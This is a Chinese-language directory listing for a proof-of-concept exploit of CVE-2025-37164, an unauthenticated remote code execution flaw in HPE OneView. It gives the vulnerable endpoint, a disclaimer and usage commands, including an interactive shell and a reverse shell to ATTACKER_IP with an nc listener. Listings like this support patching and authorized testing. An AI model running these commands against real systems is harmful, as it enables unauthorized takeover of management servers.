Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-37164-PoC — CVE-2025-37164的概念验证漏洞利用,这是HPE OneView中通过/rest/id-pools/executeCommand端点的严重未认证远程代码执行漏洞。 | Kitploit
工具/GitHubGitHub/g0vguy/cve-2025-37164-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubg0vguy/cve-2025-37164-poc

CVE-2025-37164-PoC

CVE-2025-37164的概念验证漏洞利用,这是HPE OneView中通过/rest/id-pools/executeCommand端点的严重未认证远程代码执行漏洞。

查看仓库
628个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-37164 - HPE OneView 未认证 RCE PoC

这是 CVE-2025-37164 的概念验证(PoC)利用程序,该漏洞是 HPE OneView 中的一个严重(CVSS 10.0)未认证远程代码执行漏洞。

免责声明

本软件仅供教育和授权安全测试目的使用。

  • 仅可在您拥有或已获得明确书面许可的系统上使用
  • 未经授权访问计算机系统属于违法行为
  • 作者不对因使用本工具而造成的任何滥用或损害负责
  • 本工具用于受控环境中的防御性安全研究和渗透测试

漏洞详情

  • CVE ID:CVE-2025-37164
  • CVSS 分数:10.0(严重)
  • 厂商:Hewlett Packard Enterprise (HPE)
  • 产品:HPE OneView(11.0 之前版本)
  • 类型:未认证远程代码执行
  • 补丁:升级到 HPE OneView 11.0 或更高版本

技术分析:该漏洞存在于 PUT /rest/id-pools/executeCommand 端点中,该端点无需认证,并将用户控制的输入直接传递给 Runtime.exec()。

先决条件

  • Python 3.6+
  • requests 库(pip install requests)
  • 存在漏洞的 HPE OneView 实例(已启用 'id pools' 功能)

使用方法

root@kitploit:~
# Test if target is vulnerable
python3 cve-2025-37164.py -t http://target-ip --check

# Execute a single command
python3 cve-2025-37164.py -t http://target-ip -c "id"

# Interactive command shell
python3 cve-2025-37164.py -t http://target-ip -i

# Attempt reverse shell (requires listener)
# On attacker machine: nc -lvnp 4444
python3 cve-2025-37164.py -t http://target-ip --lhost ATTACKER_IP --lport 4444
下载工具